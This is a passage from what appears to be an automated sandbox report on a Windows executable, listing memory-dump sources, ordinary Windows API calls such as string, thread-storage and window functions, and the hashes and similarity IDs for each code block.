                                                                                • Opcode Fuzzy Hash: ef6c72bd6de09845801589dab9e2aaec3edf9995b9614f7a3fa1260c4579e344
                                                                                • Instruction Fuzzy Hash: B7F01C719407489BD770BF729D09B47BAE0FFC4B10F02192EE2858BA90E6B5E400DF44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Version$MessageRegisterWindow
                                                                                • String ID: MSWHEEL_ROLLMSG
                                                                                • API String ID: 303823969-2485103130
                                                                                • Opcode ID: 19a6eabf374e2be0c850858076a1e1aaff4f111db88cdfbf779a8f123a7320ca
                                                                                • Instruction ID: d50d5e0e0bb33240a66e5835f70dac281e63486b5a77f32b3608b1497903ffd4
                                                                                • Opcode Fuzzy Hash: 19a6eabf374e2be0c850858076a1e1aaff4f111db88cdfbf779a8f123a7320ca
                                                                                • Instruction Fuzzy Hash: B7E07D3FC1002652D7212B34AC103BB66905B4C792F102237DD01433148B3C6C834EBE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetStringTypeW.KERNEL32(00000001,0044165C,00000001,00000000,?,00000100,00000000,00423634,00000001,00000020,00000100,?,00000000), ref: 004260AF
                                                                                • GetStringTypeA.KERNEL32(00000000,00000001,00441658,00000001,00000000,?,00000100,00000000,00423634,00000001,00000020,00000100,?,00000000), ref: 004260C9
                                                                                • GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,00423634,00000001,00000020,00000100,?,00000000), ref: 004260FD
                                                                                • MultiByteToWideChar.KERNEL32(00423634,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,00423634,00000001,00000020,00000100,?,00000000), ref: 00426135
                                                                                • MultiByteToWideChar.KERNEL32(00423634,00000001,00000100,00000020,?,00000100,?,00000100,00000000,00423634,00000001,00000020,00000100,?), ref: 0042618B
                                                                                • GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,00423634,00000001,00000020,00000100,?), ref: 0042619D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: StringType$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 3852931651-0
                                                                                • Opcode ID: 59748287636e8570e7ad67949cba3cbdb9fc7e4a4e9d5ec6e9b50b3242a928ce
                                                                                • Instruction ID: 9382fd85796dd67fbf0c92637a15368fee418da6a84cedbd761d260dce6618ce
                                                                                • Opcode Fuzzy Hash: 59748287636e8570e7ad67949cba3cbdb9fc7e4a4e9d5ec6e9b50b3242a928ce
                                                                                • Instruction Fuzzy Hash: C3419C72640229AFDF218F95EC85EAF3F78FB09310F514526F911D2250D3389D60DB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(0044DC44,0044D8DC,00000000,?,0044DC44,?,004319AC,0044D8DC,00000000,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4), ref: 0043174F
                                                                                • EnterCriticalSection.KERNEL32(0044DC60,00000010,?,0044DC44,?,004319AC,0044D8DC,00000000,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4), ref: 0043179E
                                                                                • LeaveCriticalSection.KERNEL32(0044DC60,00000000,?,0044DC44,?,004319AC,0044D8DC,00000000,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4), ref: 004317B1
                                                                                • LocalAlloc.KERNEL32(00000000,00000004,?,0044DC44,?,004319AC,0044D8DC,00000000,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4), ref: 004317C7
                                                                                • LocalReAlloc.KERNEL32(?,00000004,00000002,?,0044DC44,?,004319AC,0044D8DC,00000000,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4), ref: 004317D9
                                                                                • TlsSetValue.KERNEL32(0044DC44,00000000), ref: 00431815
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AllocCriticalLocalSectionValue$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 4117633390-0
                                                                                • Opcode ID: 176ef3cb3ee011ffd4a2ff260397a4d4b3dc451f129d16ba960b8dabedcd6b1b
                                                                                • Instruction ID: 248ff2318b4a829e3e7c924d3f50418c1acf93343be7b1b9815e4c657b860e75
                                                                                • Opcode Fuzzy Hash: 176ef3cb3ee011ffd4a2ff260397a4d4b3dc451f129d16ba960b8dabedcd6b1b
                                                                                • Instruction Fuzzy Hash: F831DD31200204EFDB24DF59C889F6AB7F8FB49325F10D52AE856C7660DB78E905CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

APIs
• PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00429B58
• GetWindowTextLengthA.USER32 ref: 00429B62
• GetWindowTextA.USER32 ref: 00429B8A
• SetTextColor.GDI32(?,00000000), ref: 00429BCB
• DrawTextA.USER32(?,00000000,000000FF,?,?), ref: 00429BE3
• SetTextColor.GDI32(?,?), ref: 00429BF5
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: Text$ColorWindow$DrawLength
• String ID:
• API String ID: 1177705772-0
• Opcode ID: fdb8d14a43ec11e52fd7995167efdf4abd8909a614c0f787fc5d03afb46595f8
• Instruction ID: 8ec3f89335e3202dbb25254b2851aa3520f65dd38009491273cc3397e315894a
• Opcode Fuzzy Hash: fdb8d14a43ec11e52fd7995167efdf4abd8909a614c0f787fc5d03afb46595f8
• Instruction Fuzzy Hash: 4A216B76600119AFC714CF58ED88ABBBBB9FB88311F148259FD5987394CA34EE00CB64
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: MessageSend$CaptureH_prologHelp
• String ID:
• API String ID: 432264411-0
• Opcode ID: ba773ec43775c7fc1d74b7c27bc189f3316abd4acbafee2c8573ca4eafd45aff
• Instruction ID: 53e3a261e3f671fc665b5f2ffaba15c297177ae2ac9ffc412a811d478b2d602a
• Opcode Fuzzy Hash: ba773ec43775c7fc1d74b7c27bc189f3316abd4acbafee2c8573ca4eafd45aff
• Instruction Fuzzy Hash: 9B21B270700219BFEB206F61DC85FBEB7A9EF48754F50852AB211AB1E2CBB49C009B54
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
• String ID:
• API String ID: 670545878-0
• Opcode ID: db42b04487f1006e0edf718da1ec4efdf9e3e5e7407ecc3142b4ed8f900e6900
• Instruction ID: 02b773ae430f8cdeaeeb8ce1c1956de65846d001529350d58519189c4a8cbdc9
• Opcode Fuzzy Hash: db42b04487f1006e0edf718da1ec4efdf9e3e5e7407ecc3142b4ed8f900e6900
• Instruction Fuzzy Hash: BF11CA3260133157C6315A695CA0B2FB2985F7DB56F056357EE00D7310DB68CE0186ED
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: Window$Rect$ClientCtrlLongScreen
• String ID:
• API String ID: 1315500227-0
• Opcode ID: 5a179ac777b3a794dc958dc315328cd6e58d4136817739a7159f7293b13e5f27
• Instruction ID: 3c1efa09d937633bc9f27efae014d622fb028056f8d53b6a67e7047749811959
• Opcode Fuzzy Hash: 5a179ac777b3a794dc958dc315328cd6e58d4136817739a7159f7293b13e5f27
• Instruction Fuzzy Hash: 36018F32200129BBDB125F64EC08EAF777CEF40712F858032FD11961B1E738CA1A8B98
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00424D61: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00425BD1,00000009,?,?,?,0042402B,00000001,00000074,?,00422CBF), ref: 00424D9E
  • Part of subcall function 00424D61: EnterCriticalSection.KERNEL32(?,?,?,00425BD1,00000009,?,?,?,0042402B,00000001,00000074,?,00422CBF), ref: 00424DB9
• GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000,?,?,00422CEF), ref: 00423393
  • Part of subcall function 00424DC2: LeaveCriticalSection.KERNEL32(?,00422FFE,00000009,?,00000009,00000000,?,00422FBE,000000E0,00422FAB,?,00424D81,00000018,00000000,?), ref: 00424DCF
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: CriticalSection$EnterInfoInitializeLeave
• String ID: 0D$0D$@D$@D
• API String ID: 1866836854-4104052330
• Opcode ID: a4d53608f017a08622ebb49fcea1e4122a5088e2762f03436997e2640748fc58
• Instruction ID: fc1d7e93c980405bac3e57b67ed3873592f0245d513eda6a6e41e6866fa1d3db
• Opcode Fuzzy Hash: a4d53608f017a08622ebb49fcea1e4122a5088e2762f03436997e2640748fc58
• Instruction Fuzzy Hash: 07414C317042706EE712EF65F88136ABBB0AB0531AFA840BBD545C7292D73D8B45875D
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: LongWindow$MessageSend
• String ID: (
• API String ID: 2178440468-3887548279
• Opcode ID: aa270ea6b63d68efd3deac340b9b1f8c17e8642cde5c36c8e5b05ce105977c6f
• Instruction ID: efc48133eafaa29aa690eb6f94b38460ff29542ec7ee47c098161262e5168938
• Opcode Fuzzy Hash: aa270ea6b63d68efd3deac340b9b1f8c17e8642cde5c36c8e5b05ce105977c6f
• Instruction Fuzzy Hash: 0031B0307007249FDB20AF65E885A6EBBF4FF08714F54422EE54297791DB78E804CB98
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00431FFF
  • Part of subcall function 004320EB: lstrlenA.KERNEL32(00000104,00000000,?,0043202F), ref: 00432122
• lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 004320A0
• lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004320CD
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: FileModuleNamelstrcatlstrcpylstrlen
• String ID: .HLP$.INI
• API String ID: 2421895198-3011182340
• Opcode ID: 282bdad7b7a49d818df557b9434867c1323db3431d511cd53469a609442d5936
• Instruction ID: 5c128bed24409d6a6e1a5555d9b502cf200a700464762aab5aa24b85f4135cb6
• Opcode Fuzzy Hash: 282bdad7b7a49d818df557b9434867c1323db3431d511cd53469a609442d5936
• Instruction Fuzzy Hash: DF3192B15007189FDB20DF71D884BC6B7FCAB08304F1049ABE299D2151DBB8AAC4CB54
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: Window$EnabledItemLongMessageSend
• String ID: Edit
• API String ID: 3499652902-554135844
• Opcode ID: 551976b4a16639f666a76ca1f35dad8b5f030ddcff40c72892ef058e11bacb1a
• Instruction ID: 70ccf51cc99520c0ce91b1315d5aafdff5d5d713b7c6447970839701e7ff18f3
• Opcode Fuzzy Hash: 551976b4a16639f666a76ca1f35dad8b5f030ddcff40c72892ef058e11bacb1a
• Instruction Fuzzy Hash: B701A130300221ABEA241A21BC49F6BA764AB40F11F9C452BFD41D62E1CBACDCB5891E
Uniqueness
Uniqueness Score: -1.00%

APIs
• BeginDeferWindowPos.USER32(00000000), ref: 00401F88
• GetWindowRect.USER32 ref: 00401FC2
• MapWindowPoints.USER32 ref: 00401FD7
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: Window$BeginDeferPointsRect
• String ID:
• API String ID: 736797044-0
• Opcode ID: 22a5ff366dff5bacf8a3c163e1d90f37dbb0494996546eff1d4b22c01ecbf1fe
• Instruction ID: c7c864fc1c73775e9896701d4901ab5e805bf85a1c3a526c572a3df08d31f576
• Opcode Fuzzy Hash: 22a5ff366dff5bacf8a3c163e1d90f37dbb0494996546eff1d4b22c01ecbf1fe
• Instruction Fuzzy Hash: 4E61D2B5E10219AFDB08CF98D895EEEB7B5FF88300F108159E915A7390DB74A941CFA4
Uniqueness
Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Classlstrcat$H_prologInfoRegister
                                                                                • String ID:
                                                                                • API String ID: 106226465-0
                                                                                • Opcode ID: eed4b84bccfb19627f7a245485e70eb10700be14da6838876d155507445ffc71
                                                                                • Instruction ID: 3e604bf1dc942f87e133d720b30784e4d17acb1e6ac692f6707cea616a0a4b9d
                                                                                • Opcode Fuzzy Hash: eed4b84bccfb19627f7a245485e70eb10700be14da6838876d155507445ffc71
                                                                                • Instruction Fuzzy Hash: 59112635600258BFDB10AF659C01AEF7BB8EF09714F00955FF912A7261C3B89604CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,00000000,004242D4,00000000,?,?,?,00422D49,?,?,00000000,00000000), ref: 00424075
                                                                                • TlsGetValue.KERNEL32(?,00000000,004242D4,00000000,?,?,?,00422D49,?,?,00000000,00000000), ref: 00424083
                                                                                • SetLastError.KERNEL32(00000000,?,00000000,004242D4,00000000,?,?,?,00422D49,?,?,00000000,00000000), ref: 004240CF
                                                                                  • Part of subcall function 00425B9B: HeapAlloc.KERNEL32(00000008,?,?,?,?,0042402B,00000001,00000074,?,00422CBF), ref: 00425BF0
                                                                                • TlsSetValue.KERNEL32(00000000,?,00000000,004242D4,00000000,?,?,?,00422D49,?,?,00000000,00000000), ref: 004240A7
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004240B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                                • String ID:
                                                                                • API String ID: 2020098873-0
                                                                                • Opcode ID: d5741f88fa105702ab0fd0ea739f22cd9430d735240c3ca9594da3314135cd1b
                                                                                • Instruction ID: 4d51f5e9ff976c3d8aa0b33b00f6da95a91a60659217ff2ca041860551d2a9a3
                                                                                • Opcode Fuzzy Hash: d5741f88fa105702ab0fd0ea739f22cd9430d735240c3ca9594da3314135cd1b
                                                                                • Instruction Fuzzy Hash: CCF0BB35701631ABDB312F71FC0965A3B50EF81BB2750063AF641972A0CB68C841869C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • TlsFree.KERNEL32(00000000,?,?,00431A8B,00000000,00000001), ref: 0043158A
                                                                                • GlobalHandle.KERNEL32(005CFE28), ref: 004315B2
                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,00431A8B,00000000,00000001), ref: 004315BB
                                                                                • GlobalFree.KERNEL32 ref: 004315C2
                                                                                • DeleteCriticalSection.KERNEL32(0044DC28,?,?,00431A8B,00000000,00000001), ref: 004315CC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Global$Free$CriticalDeleteHandleSectionUnlock
                                                                                • String ID:
                                                                                • API String ID: 2159622880-0
                                                                                • Opcode ID: 315c397cf6710f5a852baad01ed5bd618a76d380d4ab566d283cddf702d200ec
                                                                                • Instruction ID: f4691cfff8999cfb573a41088b72928bc26d7a1f55660c634f100cfc85d66453
                                                                                • Opcode Fuzzy Hash: 315c397cf6710f5a852baad01ed5bd618a76d380d4ab566d283cddf702d200ec
                                                                                • Instruction Fuzzy Hash: CFF089313002006BDB219F399C0CA6B77ED9FC9722B15251AF416D3360DF78DD058A6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GlobalLock.KERNEL32 ref: 0042ED62
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 0042EDB5
                                                                                • GlobalUnlock.KERNEL32(?), ref: 0042EE4C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Global$ByteCharLockMultiUnlockWide
                                                                                • String ID: System
                                                                                • API String ID: 231414890-3470857405
                                                                                • Opcode ID: 8674a6de79c7ac022e739996734f591b597daf41b031573bcc3ed4604b2a7868
                                                                                • Instruction ID: 4adcf3ef6963ff03684ea47ed662c196df9c71d1413aca76686aaab65e2fadc4
                                                                                • Opcode Fuzzy Hash: 8674a6de79c7ac022e739996734f591b597daf41b031573bcc3ed4604b2a7868
                                                                                • Instruction Fuzzy Hash: 29412A32910226EFCF10DF65DC819EEBBB4FF04354F50816AE815AB244D739AA46CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetClassNameA.USER32(?,?,00000010), ref: 00428661
                                                                                • lstrcmpA.KERNEL32(Button,?), ref: 0042867A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ClassNamelstrcmp
                                                                                • String ID: Button
                                                                                • API String ID: 3770760073-1034594571
                                                                                • Opcode ID: 8c1800163102430cd96ecfbcb4d70ec9b706f00dce88a35e371eaaa8c99d34f1
                                                                                • Instruction ID: 4b3f4e57a7d0d293a09f5d8ccdaef0b1ae3ff54e9e5887e22dad0bc62e7f1556
                                                                                • Opcode Fuzzy Hash: 8c1800163102430cd96ecfbcb4d70ec9b706f00dce88a35e371eaaa8c99d34f1
